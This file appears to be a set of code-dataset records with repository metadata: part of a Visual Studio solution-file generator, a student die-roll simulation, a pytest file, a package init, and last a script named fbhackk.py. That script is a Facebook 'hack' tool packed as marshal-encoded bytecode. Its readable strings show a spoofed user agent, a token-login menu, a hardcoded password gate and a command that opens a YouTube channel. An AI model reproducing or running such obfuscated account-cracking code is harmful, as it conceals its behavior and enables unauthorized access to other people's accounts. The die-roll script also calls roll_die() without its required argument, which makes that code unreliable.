solution_project_filename = '{0:s}.vcxproj'.format(
solution_project.filename)
self.WriteLine((
'Project("{{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}}") = "{0:s}", '
'"{1:s}", "{{{2:s}}}"').format(
solution_project.name, solution_project_filename,
solution_project.guid.upper()))
self.WriteLine('EndProject')
class VS2012SolutionFileWriter(VS2010SolutionFileWriter):
"""Visual Studio 2012 solution file writer."""
def WriteHeader(self):
"""Writes a file header."""
self.WriteBinaryData(b'\xef\xbb\xbf\r\n')
self.WriteLines([
'Microsoft Visual Studio Solution File, Format Version 12.00',
'# Visual Studio Express 2012 for Windows Desktop'])
def WriteProject(self, solution_project):
"""Writes a project section.
Args:
solution_project (VSSolutionProject): project.
"""
solution_project_filename = '{0:s}.vcxproj'.format(
solution_project.filename)
self.WriteLine((
'Project("{{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}}") = "{0:s}", '
'"{1:s}", "{{{2:s}}}"').format(
solution_project.name, solution_project_filename,
solution_project.guid.upper()))
# TODO: what about:
# '\tProjectSection(ProjectDependencies) = postProject'
# '\t\t{%GUID%} = {%GUID}'
# '\tEndProjectSection'
self.WriteLine('EndProject')
class VS2013SolutionFileWriter(VS2010SolutionFileWriter):
"""Visual Studio 2013 solution file writer."""
def WriteHeader(self):
"""Writes a file header."""
self.WriteBinaryData(b'\xef\xbb\xbf\r\n')
self.WriteLines([
'Microsoft Visual Studio Solution File, Format Version 12.00',
'# Visual Studio Express 2013 for Windows Desktop',
'VisualStudioVersion = 12.0.21005.1',
'MinimumVisualStudioVersion = 10.0.40219.1'])
class VS2015SolutionFileWriter(VS2010SolutionFileWriter):
"""Visual Studio 2015 solution file writer."""
def WriteHeader(self):
"""Writes a file header."""
self.WriteBinaryData(b'\xef\xbb\xbf\r\n')
self.WriteLines([
'Microsoft Visual Studio Solution File, Format Version 12.00',
'# Visual Studio 14',
'VisualStudioVersion = 14.0.25420.1',
'MinimumVisualStudioVersion = 10.0.40219.1'])
class VS2017SolutionFileWriter(VS2010SolutionFileWriter):
"""Visual Studio 2017 solution file writer."""
def _WriteExtensibilityGlobals(self):
"""Writes the extensibility globals."""
# TODO: determine if GUID is unique.
self.WriteLines([
'\tGlobalSection(ExtensibilityGlobals) = postSolution',
'\t\tSolutionGuid = {E41FC29C-7FE6-4F98-85AD-1ED968E86446}',
'\tEndGlobalSection'])
def WriteConfigurations(self, solution_configurations, solution_projects):
"""Writes the configurations.
Args:
solution_configurations (VSConfigurations): configurations.
solution_projects (list[VSSolutionProject]): projects.
"""
self.WriteLine('Global')
self._WriteSolutionConfigurationPlatforms(
solution_configurations, solution_projects)
self._WriteProjectConfigurationPlatforms(
solution_configurations, solution_projects)
self._WriteSolutionProperties()
# self._WriteExtensibilityGlobals()
self.WriteLine('EndGlobal')
def WriteHeader(self):
"""Writes a file header."""
self.WriteBinaryData(b'\xef\xbb\xbf\r\n')
self.WriteLines([
'Microsoft Visual Studio Solution File, Format Version 12.00',
'# Visual Studio 15',
'VisualStudioVersion = 15.0.26730.10',
'MinimumVisualStudioVersion = 10.0.40219.1'])
class VS2019SolutionFileWriter(VS2017SolutionFileWriter):
"""Visual Studio 2019 solution file writer."""
def WriteHeader(self):
"""Writes a file header."""
self.WriteBinaryData(b'\xef\xbb\xbf\r\n')
self.WriteLines([
'Microsoft Visual Studio Solution File, Format Version 12.00',
'# Visual Studio Version 16',
'VisualStudioVersion = 16.0.33423.256',
'MinimumVisualStudioVersion = 10.0.40219.1'])
class VS2022SolutionFileWriter(VS2017SolutionFileWriter):
"""Visual Studio 2022 solution file writer."""
def WriteHeader(self):
"""Writes a file header."""
self.WriteBinaryData(b'\xef\xbb\xbf\r\n')
self.WriteLines([
'Microsoft Visual Studio Solution File, Format Version 12.00',
'# Visual Studio Version 17',
'VisualStudioVersion = 17.5.33516.290',
'MinimumVisualStudioVersion = 10.0.40219.1'])
|
[
"[email protected]"
] | |
38a81091e93b14ef1136031dcd8071060b60dc35
|
1ff6cd4b1114b530a0f2918f6d2193b2ce270bcf
|
/Week-2/Day_4/die_roll.py
|
6d39b06fc9f5660daad7d8d3199b080ad48932b8
|
[] |
no_license
|
Ace238/python-bootcamp
|
e8fac460488701eff6453bd81ddab8eb4059a2aa
|
adea58b8f9b87a52338181f677f01d6cbc802046
|
refs/heads/master
| 2020-12-05T15:08:58.366028 | 2020-01-16T05:22:02 | 2020-01-16T05:22:02 | 232,150,937 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,582 |
py
|
import random
def roll_die(dice_max):
"""
returns a die roll - random integer between 1 and 6
0 through 6 are each side of a standard die
"""
return random.randint(1,dice_max)
def monte_carlo(n):
"""
performs a monte carlo simulation of a die roll
[PARAM]\t n (int) - number of samples
[RETURN]\t None - prints out the results of the simulation
"""
one_count = 0
two_count = 0
three_count = 0
four_count = 0
five_count = 0
six_count = 0
exp_count = 0
while exp_count <n:
result = roll_die()
if(result == 1):
one_count += 1
elif(result == 2):
two_count += 1
elif(result == 3):
three_count += 1
elif(result == 4):
four_count += 1
elif(result == 5):
five_count += 1
elif(result == 6):
six_count += 1
exp_count += 1
print(f"There were {n} simulations performed.")
msg = f"There were {(one_count/n) * 100}% ones"
print(msg)
msg = f"There were {(two_count/n) * 100}% twos"
print(msg)
msg = f"There were {(three_count/n) * 100}% threes"
print(msg)
msg = f"There were {(four_count/n) * 100}% fours"
print(msg)
msg = f"There were {(five_count/n) * 100}% fives"
print(msg)
msg = f"There were {(six_count/n) * 100}% sixes"
print(msg)
# monte_carlo(100000)
def monte_carlo_with_lists(N, dice_max = 6):
results = []
for exp in range(0,N):
results.append(roll_die(dice_max))
print(f"{N} experiments performed")
for outcome in range(1, dice_max + 1):
count = results.count(outcome)
msg = f"The probability of {outcome} = {(count/N)*100}%"
print(msg)
dice_max = 10
monte_carlo_with_lists(10000, dice_max)
|
[
"[email protected]"
] | |
e54bf365ae9ed61261b9902b687769361a488445
|
dfbc64250dfdecbf70377b6cf6549e04521795ec
|
/codingALGO/test_solve.py
|
02d9f40f03d44be312992c89f5619a2bc3a41fa2
|
[] |
no_license
|
sagarrshd/mm
|
60a939d09cc0cef3ce191a3e3b7d387fbcbbcca5
|
7fb9287c567507a5e6a05b6367bc21b15d03d984
|
refs/heads/master
| 2023-04-18T10:11:28.492485 | 2021-05-01T19:14:15 | 2021-05-01T19:14:15 | 363,487,969 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 247 |
py
|
import pytest
from solve import count_sum_lists
def test1():
A = [1, 2, 8]
k = 1000
B = 2
res = count_sum_lists(A, k, B)
assert res == 3
def test2():
A = [5, 17, 10000, 11]
k = 1000
B = 4
res = count_sum_lists(A, k, B)
assert res == 0
|
[
"[email protected]"
] | |
848b91f09b40a31a3b9e5798f08cb9dc68841a53
|
bd8b3d43a465b26f0d86a3007b41d6a3c22345a6
|
/svsutils/iterators/__init__.py
|
6bde41920adb8b8446e1ce7254e5cba9a485b1fe
|
[] |
no_license
|
nathanin/svsutils
|
aed5d361ff4716390e093d6bab6bf3cc6dd69a9b
|
5789c3e589ce9244b21a24d6cdc3909bc4e04517
|
refs/heads/master
| 2020-06-25T06:06:37.019860 | 2019-12-17T05:08:35 | 2019-12-17T05:08:35 | 199,225,548 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 122 |
py
|
from .iterator_factory import PythonIterator, TensorflowIterator
__all__ = [
'PythonIterator',
'TensorflowIterator'
]
|
[
"[email protected]"
] | |
4ae5f578d4843f3c010396030d69aa334d3cb6e3
|
3fdda7a9a8efb5c41302fe39cf8cd74c09aa2326
|
/fbhackk.py
|
dba2d05a9f3a2997c14a7edaf34c360ab584cebd
|
[] |
no_license
|
RandiSr/dark-fb
|
330809c38fe713c2d70e1571a17f400ba7e5edf5
|
0088d24c5b344fc71d8327dcf70ef1717cf224c4
|
refs/heads/master
| 2020-07-22T02:51:11.719676 | 2019-09-08T03:09:14 | 2019-09-08T03:09:14 | 207,052,986 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 204,567 |
py
|
#Coder By: RandiSr
#mau Recode silahkan;v
#Team: Muslim Cyber Army
#Github: https://github.com/RandiSr
#Channel Youtube: RANDIOLOYY
import marshal
exec(marshal.loads('''c\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00@\x00\x00\x00sI\x04\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x01\x00l\x02\x00Z\x02\x00d\x00\x00d\x01\x00l\x03\x00Z\x03\x00d\x00\x00d\x01\x00l\x04\x00Z\x04\x00d\x00\x00d\x01\x00l\x05\x00Z\x05\x00d\x00\x00d\x01\x00l\x06\x00Z\x06\x00d\x00\x00d\x01\x00l\x07\x00Z\x07\x00d\x00\x00d\x01\x00l\x08\x00Z\x08\x00d\x00\x00d\x01\x00l\t\x00Z\t\x00d\x00\x00d\x01\x00l\n\x00Z\n\x00d\x00\x00d\x01\x00l\x0b\x00Z\x0b\x00d\x00\x00d\x02\x00l\x0c\x00m\r\x00Z\r\x00\x01y\x10\x00d\x00\x00d\x01\x00l\x0e\x00Z\x0e\x00Wn\x1e\x00\x04e\x0f\x00k\n\x00r\xd0\x00\x01\x01\x01e\x00\x00j\x10\x00d\x03\x00\x83\x01\x00\x01n\x01\x00Xy\x10\x00d\x00\x00d\x01\x00l\x11\x00Z\x11\x00Wn\x1e\x00\x04e\x0f\x00k\n\x00r\x01\x01\x01\x01\x01e\x00\x00j\x10\x00d\x04\x00\x83\x01\x00\x01n\x01\x00Xd\x00\x00d\x05\x00l\x12\x00m\x13\x00Z\x13\x00\x01d\x00\x00d\x06\x00l\x0e\x00m\x14\x00Z\x14\x00\x01e\x15\x00e\x01\x00\x83\x01\x00\x01e\x01\x00j\x16\x00d\x07\x00\x83\x01\x00\x01e\x0e\x00j\x14\x00\x83\x00\x00Z\x17\x00e\x17\x00j\x18\x00e\x19\x00\x83\x01\x00\x01e\x17\x00j\x1a\x00e\x0e\x00j\x1b\x00j\x1c\x00\x83\x00\x00d\x08\x00d\t\x00\x83\x01\x01\x01dO\x00g\x01\x00e\x17\x00_\x1d\x00d\x0c\x00\x84\x00\x00Z\x1e\x00d\r\x00\x84\x00\x00Z\x1f\x00d\x0e\x00\x84\x00\x00Z \x00d\x0f\x00\x84\x00\x00Z!\x00d\x10\x00Z"\x00d\x11\x00\x84\x00\x00Z#\x00d\x12\x00a$\x00g\x00\x00Z%\x00g\x00\x00a&\x00g\x00\x00a\'\x00g\x00\x00a(\x00g\x00\x00a)\x00g\x00\x00Z*\x00g\x00\x00Z+\x00g\x00\x00Z,\x00g\x00\x00Z-\x00g\x00\x00Z.\x00g\x00\x00Z/\x00g\x00\x00Z0\x00g\x00\x00Z1\x00g\x00\x00Z2\x00g\x00\x00Z3\x00g\x00\x00Z4\x00g\x00\x00Z5\x00g\x00\x00Z6\x00g\x00\x00Z7\x00g\x00\x00Z8\x00d\x13\x00Z9\x00d\x14\x00Z:\x00d\x15\x00Z;\x00d\x16\x00Z<\x00d\x17\x00\x84\x00\x00Z=\x00d\x18\x00\x84\x00\x00Z>\x00d\x19\x00\x84\x00\x00Z?\x00d\x1a\x00\x84\x00\x00Z@\x00d\x1b\x00\x84\x00\x00ZA\x00d\x1c\x00\x84\x00\x00ZB\x00d\x1d\x00\x84\x00\x00ZC\x00d\x1e\x00\x84\x00\x00ZD\x00d\x1f\x00\x84\x00\x00ZE\x00d \x00\x84\x00\x00ZF\x00d!\x00\x84\x00\x00ZG\x00d"\x00\x84\x00\x00ZH\x00d#\x00\x84\x00\x00ZI\x00d$\x00\x84\x00\x00ZJ\x00d%\x00\x84\x00\x00ZK\x00d&\x00\x84\x00\x00ZL\x00d\'\x00\x84\x00\x00ZM\x00d(\x00\x84\x00\x00ZN\x00d)\x00\x84\x00\x00ZO\x00d*\x00\x84\x00\x00ZP\x00d+\x00\x84\x00\x00ZQ\x00d,\x00\x84\x00\x00ZR\x00d-\x00\x84\x00\x00ZS\x00d.\x00\x84\x00\x00ZT\x00d/\x00\x84\x00\x00ZU\x00d0\x00\x84\x00\x00ZV\x00d1\x00\x84\x00\x00ZW\x00d2\x00\x84\x00\x00ZX\x00d3\x00\x84\x00\x00ZY\x00d4\x00\x84\x00\x00ZZ\x00d5\x00\x84\x00\x00Z[\x00d6\x00\x84\x00\x00Z\\\x00d7\x00\x84\x00\x00Z]\x00d8\x00\x84\x00\x00Z^\x00d9\x00\x84\x00\x00Z_\x00d:\x00\x84\x00\x00Z`\x00d;\x00\x84\x00\x00Za\x00d<\x00\x84\x00\x00Zb\x00d=\x00\x84\x00\x00Zc\x00d>\x00\x84\x00\x00Zd\x00d?\x00\x84\x00\x00Ze\x00d@\x00\x84\x00\x00Zf\x00dA\x00\x84\x00\x00Zg\x00dB\x00\x84\x00\x00Zh\x00dC\x00\x84\x00\x00Zi\x00dD\x00\x84\x00\x00Zj\x00dE\x00\x84\x00\x00Zk\x00dF\x00\x84\x00\x00Zl\x00dG\x00\x84\x00\x00Zm\x00dH\x00\x84\x00\x00Zn\x00dI\x00\x84\x00\x00Zo\x00dJ\x00\x84\x00\x00Zp\x00dK\x00\x84\x00\x00Zq\x00dL\x00\x84\x00\x00Zr\x00dM\x00\x84\x00\x00Zs\x00et\x00dN\x00\x84\x01\x00Zu\x00e=\x00\x83\x00\x00\x01d\x01\x00S(P\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\n\x00\x00\x00ThreadPools\x16\x00\x00\x00pip2 install mechanizes\x15\x00\x00\x00pip2 install requests(\x01\x00\x00\x00t\x0f\x00\x00\x00ConnectionError(\x01\x00\x00\x00t\x07\x00\x00\x00Browsert\x04\x00\x00\x00utf8t\x08\x00\x00\x00max_timei\x01\x00\x00\x00s\n\x00\x00\x00User-AgentsR\x00\x00\x00Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00C\x00\x00\x00s\x16\x00\x00\x00d\x01\x00GHt\x00\x00j\x01\x00j\x02\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\x0f\x00\x00\x00\x1b[1;91m[!] Exit(\x03\x00\x00\x00t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>t\x06\x00\x00\x00keluar\x1f\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x05\x01c\x01\x00\x00\x00\x04\x00\x00\x00\x08\x00\x00\x00C\x00\x00\x00sS\x00\x00\x00d\x01\x00}\x01\x00d\x02\x00}\x02\x00x:\x00|\x00\x00D]2\x00}\x03\x00|\x02\x00d\x03\x00|\x01\x00t\x00\x00j\x01\x00d\x04\x00t\x02\x00|\x01\x00\x83\x01\x00d\x05\x00\x18\x83\x02\x00\x19\x17|\x03\x00\x177}\x02\x00q\x13\x00Wt\x03\x00|\x02\x00\x83\x01\x00S(\x06\x00\x00\x00Nt\x07\x00\x00\x00mhkbpcPt\x00\x00\x00\x00t\x01\x00\x00\x00!i\x00\x00\x00\x00i\x01\x00\x00\x00(\x04\x00\x00\x00t\x06\x00\x00\x00randomt\x07\x00\x00\x00randintt\x03\x00\x00\x00lent\x05\x00\x00\x00cetak(\x04\x00\x00\x00t\x01\x00\x00\x00xt\x01\x00\x00\x00wt\x01\x00\x00\x00dt\x01\x00\x00\x00i(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>t\x04\x00\x00\x00acak$\x00\x00\x00s\n\x00\x00\x00\x00\x01\x06\x01\x06\x01\r\x010\x01c\x01\x00\x00\x00\x04\x00\x00\x00\x07\x00\x00\x00C\x00\x00\x00s~\x00\x00\x00d\x01\x00}\x01\x00xA\x00|\x01\x00D]9\x00}\x02\x00|\x01\x00j\x00\x00|\x02\x00\x83\x01\x00}\x03\x00|\x00\x00j\x01\x00d\x02\x00|\x02\x00\x16d\x03\x00t\x02\x00d\x04\x00|\x03\x00\x17\x83\x01\x00\x16\x83\x02\x00}\x00\x00q\r\x00W|\x00\x00d\x05\x007}\x00\x00|\x00\x00j\x01\x00d\x06\x00d\x05\x00\x83\x02\x00}\x00\x00t\x03\x00j\x04\x00j\x05\x00|\x00\x00d\x07\x00\x17\x83\x01\x00\x01d\x00\x00S(\x08\x00\x00\x00NR\t\x00\x00\x00s\x03\x00\x00\x00!%ss\x07\x00\x00\x00\x1b[%s;1mi\x1f\x00\x00\x00s\x04\x00\x00\x00\x1b[0ms\x02\x00\x00\x00!0s\x01\x00\x00\x00\n(\x06\x00\x00\x00t\x05\x00\x00\x00indext\x07\x00\x00\x00replacet\x03\x00\x00\x00strR\x06\x00\x00\x00t\x06\x00\x00\x00stdoutt\x05\x00\x00\x00write(\x04\x00\x00\x00R\x10\x00\x00\x00R\x11\x00\x00\x00R\x13\x00\x00\x00t\x01\x00\x00\x00j(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x0f\x00\x00\x00+\x00\x00\x00s\x0e\x00\x00\x00\x00\x01\x06\x01\r\x01\x0f\x01(\x01\n\x01\x12\x01c\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00sC\x00\x00\x00x<\x00|\x00\x00d\x01\x00\x17D]0\x00}\x01\x00t\x00\x00j\x01\x00j\x02\x00|\x01\x00\x83\x01\x00\x01t\x00\x00j\x01\x00j\x03\x00\x83\x00\x00\x01t\x04\x00j\x05\x00d\x02\x00\x83\x01\x00\x01q\x0b\x00Wd\x00\x00S(\x03\x00\x00\x00Ns\x01\x00\x00\x00\ng\x9a\x99\x99\x99\x99\x99\xb9?(\x06\x00\x00\x00R\x06\x00\x00\x00R\x18\x00\x00\x00R\x19\x00\x00\x00t\x05\x00\x00\x00flusht\x04\x00\x00\x00timet\x05\x00\x00\x00sleep(\x02\x00\x00\x00t\x01\x00\x00\x00zt\x01\x00\x00\x00e(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>t\x05\x00\x00\x00jalan5\x00\x00\x00s\x08\x00\x00\x00\x00\x01\x11\x01\x10\x01\r\x01s\xec\x03\x00\x00\n\x1b[1;96m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\n\x1b[1;96m\xe2\x96\x88\xe2\x96\x84\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84\xe2\x96\x88 \n\x1b[1;96m\xe2\x96\x88 \xe2\x96\xbc\xe2\x96\xbc\xe2\x96\xbc\xe2\x96\xbc\xe2\x96\xbc _-_-- \xe2\x97\x8f\xe2\x96\xac\xe2\x96\xac\xe2\x96\xac\xe2\x96\xac\xe2\x96\xac\xe2\x96\xac\xe2\x96\xac\xe2\x96\xac\xe2\x96\xac\xe0\xb9\x91\xdb\xa9\xdb\xa9\xe0\xb9\x91\xe2\x96\xac\xe2\x96\xac\xe2\x96\xac\xe2\x96\xac\xe2\x96\xac\xe2\x96\xac\xe2\x96\xac\xe2\x96\xac\xe2\x97\x8f\n\x1b[1;96m\xe2\x96\x88. _-_-- -_ -- RECODE : RandiSr\n\x1b[1;96m\xe2\x96\x88 \xe2\x96\xb2\xe2\x96\xb2\xe2\x96\xb2\xe2\x96\xb2\xe2\x96\xb2 -_ -\xc2\xab============\xe2\x9c\xa7==========\xc2\xbb\n\x1b[1;96m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88 SUBSCRIBE NOW TO MY CHANNELL ...!!\n\x1b[1;96m \xe2\x96\x88\xe2\x96\x88 \xe2\x96\x88\xe2\x96\x88 VIP-V1 by RandiSr \n\x1b[1;93m\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x97\n\x1b[1;93m\xe2\x95\x91\x1b[1;96m\xc2\xa4 \x1b[1;93mAuthor \x1b[1;93m: \x1b[1;93mMr.NEWBIE3X \x1b[1;93m \xe2\x95\x91\n\x1b[1;93m\xe2\x95\x91\x1b[1;96m\xc2\xa4 \x1b[1;93mKontak \x1b[1;93m: \x1b[1;93m\x1b[4m081290587***\x1b[0m \x1b[1;93m \xe2\x95\x91\n\x1b[1;93m\xe2\x95\x91\x1b[1;96m\xc2\xa4 \x1b[1;93mEmail \x1b[1;93m : \x1b[1;93m\x1b[[email protected]\x1b[0m \x1b[1;93m \xe2\x95\x91\n\x1b[1;93m\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\nc\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00sF\x00\x00\x00d\x01\x00d\x02\x00d\x03\x00g\x03\x00}\x00\x00x0\x00|\x00\x00D](\x00}\x01\x00d\x04\x00|\x01\x00\x17Gt\x00\x00j\x01\x00j\x02\x00\x83\x00\x00\x01t\x03\x00j\x04\x00d\x05\x00\x83\x01\x00\x01q\x16\x00Wd\x00\x00S(\x06\x00\x00\x00Ns\x04\x00\x00\x00. s\x04\x00\x00\x00.. s\x07\x00\x00\x00...... s,\x00\x00\x00\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mTunggu sebentar \x1b[1;97mi\x01\x00\x00\x00(\x05\x00\x00\x00R\x06\x00\x00\x00R\x18\x00\x00\x00R\x1b\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00(\x02\x00\x00\x00t\x05\x00\x00\x00titikt\x01\x00\x00\x00o(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>t\x03\x00\x00\x00tikL\x00\x00\x00s\n\x00\x00\x00\x00\x01\x0f\x01\r\x01\x08\x00\r\x00i\x00\x00\x00\x00s\r\x00\x00\x00\x1b[31mNot Vulns\t\x00\x00\x00\x1b[32mVulnt\t\x00\x00\x00randioloyt\x08\x00\x00\x0016122003c\x00\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\'\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y \x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00t\x04\x00\x83\x00\x00\x01Wn\xf3\x00\x04t\x05\x00t\x06\x00f\x02\x00k\n\x00r"\x01\x01\x01\x01t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x07\x00GHt\x08\x00j\t\x00d\x04\x00\x83\x01\x00\x01d\x05\x00GHt\x08\x00j\t\x00d\x06\x00\x83\x01\x00\x01t\x00\x00j\x01\x00d\x07\x00\x83\x01\x00\x01d\x08\x00GHt\x08\x00j\t\x00d\t\x00\x83\x01\x00\x01d\n\x00GHt\n\x00d\x0b\x00\x83\x01\x00}\x01\x00|\x01\x00t\x0b\x00k\x02\x00r\t\x01t\n\x00d\x0c\x00\x83\x01\x00}\x02\x00|\x02\x00t\x0c\x00k\x02\x00r\xe3\x00d\r\x00GHt\n\x00d\x0e\x00\x83\x01\x00}\x03\x00t\r\x00\x83\x00\x00\x01q\x1f\x01d\x0f\x00GHt\n\x00d\x10\x00\x83\x01\x00\x01t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x0e\x00\x83\x00\x00\x01q#\x01d\x11\x00GHt\n\x00d\x12\x00\x83\x01\x00\x01t\x0e\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(\x13\x00\x00\x00Nt\x05\x00\x00\x00resets\x07\x00\x00\x00mew.txtt\x01\x00\x00\x00ri\x01\x00\x00\x00s*\x00\x00\x00Biasanya yg gak subscribe tidak bisa logini\x03\x00\x00\x00sB\x00\x00\x00xdg-open https://www.youtube.com/channel/UCbZ45S0QGbo5IAaItt-mBlA s\x1d\x00\x00\x00User dan Password Kontak me;)i\x05\x00\x00\x00s\x1b\x00\x00\x00Masukan User dan Pass nya ?s,\x00\x00\x00\n\x1b[32;1m[\x1b[33;1m#\x1b[32;1m]\x1b[37;1m Username : s+\x00\x00\x00\x1b[32;1m[\x1b[33;1m#\x1b[32;1m]\x1b[37;1m Password : s.\x00\x00\x00\x1b[32;1m[\x1b[32;1m+\x1b[32;1m]\x1b[37;1m login Berhasils8\x00\x00\x00\x1b[32;1m[\x1b[31;1m+\x1b[32;1m]\x1b[37;1m Press Enter to continue sB\x00\x00\x00\x1b[32;1m[\x1b[31;1m-\x1b[32;1m]\x1b[37;1m Password \x1b[31;1mlicensi anda salahs5\x00\x00\x00\x1b[32;1m[\x1b[31;1m+\x1b[32;1m]\x1b[37;1m You Must Enter Again s5\x00\x00\x00\x1b[32;1m[\x1b[31;1m-\x1b[32;1m]\x1b[37;1m Username \x1b[31;1mSalahs6\x00\x00\x00\x1b[32;1m[\x1b[31;1m+\x1b[32;1m]\x1b[37;1m You Must Enter Again (\x0f\x00\x00\x00R\x05\x00\x00\x00t\x06\x00\x00\x00systemt\x04\x00\x00\x00opent\x04\x00\x00\x00readt\x04\x00\x00\x00menut\x08\x00\x00\x00KeyErrort\x07\x00\x00\x00IOErrort\x04\x00\x00\x00logoR\x1c\x00\x00\x00R\x1d\x00\x00\x00t\t\x00\x00\x00raw_inputt\x04\x00\x00\x00namet\x04\x00\x00\x00pawst\x05\x00\x00\x00logint\x02\x00\x00\x00an(\x04\x00\x00\x00t\x05\x00\x00\x00tokett\x05\x00\x00\x00unamet\x03\x00\x00\x00pwdt\x03\x00\x00\x00cek(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R3\x00\x00\x00k\x00\x00\x00s8\x00\x00\x00\x00\x01\r\x01\x03\x01\x15\x01\x0b\x01\x13\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\r\x01\x05\x01\r\x01\x05\x01\x0c\x01\x0c\x01\x0c\x01\x0c\x01\x05\x01\x0c\x01\n\x02\x05\x01\n\x01\r\x01\n\x02\x05\x01\n\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\x9f\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00GHd\x02\x00GHd\x03\x00GHd\x04\x00GHd\x05\x00GHt\x03\x00d\x06\x00\x83\x01\x00}\x00\x00|\x00\x00d\x07\x00k\x02\x00rM\x00d\x08\x00GHt\x04\x00\x83\x00\x00\x01nN\x00|\x00\x00d\t\x00k\x02\x00rc\x00t\x05\x00\x83\x00\x00\x01n8\x00|\x00\x00d\n\x00k\x02\x00ry\x00t\x06\x00\x83\x00\x00\x01n"\x00|\x00\x00d\x0b\x00k\x02\x00r\x8f\x00t\x04\x00\x83\x00\x00\x01n\x0c\x00d\x08\x00GHt\x04\x00\x83\x00\x00\x01d\x00\x00S(\x0c\x00\x00\x00NR&\x00\x00\x00s+\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m1.\x1b[1;97m Logins7\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m2.\x1b[1;97m Login using tokens*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;91m0.\x1b[1;97m Exits\n\x00\x00\x00\x1b[1;97m\xe2\x95\x91s\x1d\x00\x00\x00\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\x1b[1;91mD \x1b[1;97mR\n\x00\x00\x00s\x16\x00\x00\x00\x1b[1;91m[!] Wrong 